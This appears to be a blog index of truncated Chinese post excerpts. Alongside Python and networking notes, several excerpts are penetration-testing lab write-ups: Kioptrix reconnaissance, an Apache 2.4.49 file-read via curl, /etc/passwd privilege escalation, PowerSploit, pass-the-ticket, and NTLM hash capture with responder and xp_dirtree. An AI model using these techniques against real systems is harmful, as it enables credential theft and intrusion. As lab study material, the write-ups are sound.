1.列表的定义#字面量[元素1，元素2，元素3，元素4，...]#定义变量变量名称=[元素1，元素2，元素3，元素4，...]#定义空列表变量名称=[]变量名称=list()列表内的每一个数据，称之为元素以[]作为标...

实验环境攻击者:Kali 192.168.192.128受害者 Kioptrix Level 1  IP未知攻击者和受害者在同一网段 1. 信息收集寻找靶机IPnmap -sn 192.168.192.0/24找到靶机IP为192.168.192.151 查看受害者服...

目标IP为:192.168.174.16web服务器为Apache httpd 2.4.49https://www.exploit-db.com/exploits/50383现在192.168.174.16在cgi-bin有文件包含漏洞 尝试用curl得到/opt/passwordscurl http://192...

1. __init__    构造方法class student: def __init__(self, name, age, tel): self.name = name self.age = age self.tel = tel print('student类创建了一个类对象') stu1 = student('a',31,...

1. 前言常见的以太网设备包括Hub、交换机等。交换机工作在数据链路层，它有效地隔离了以太网中的冲突域，极大地提升了以太网的性能。 2. 小型交换网络交换机工作在数据链路层，转发数据帧。随...

提权姿势：通过对/etc/passwd文件写入的方式进行提权能向/etc/passwd文件写入一个具有root用户权限的账户Linux账户文件/etc/passwd        密码文件/etc/shadow有多种方法可以找到写入/etc/...

1. 下载https://github.com/PowerShellMafia/PowerSploit并解压发现我们直接使用PowerSploit脚本是不行的 还需要几步安装 2. 修改目录名称将PowerSploit-master 改成PowerSploit 3. 目录移动...

传递票证攻击利用了 TGS，它可以导出并重新注入到网络的其他位置，然后用于对特定服务进行身份验证。此外，如果服务票证属于当前用户，则不需要管理权限。在这种情况下，我们将滥用 dave 已有的...

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...

https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/?source=post_page-----b14a6e535e1f-------------------------------- 1. 查看版本curl htt...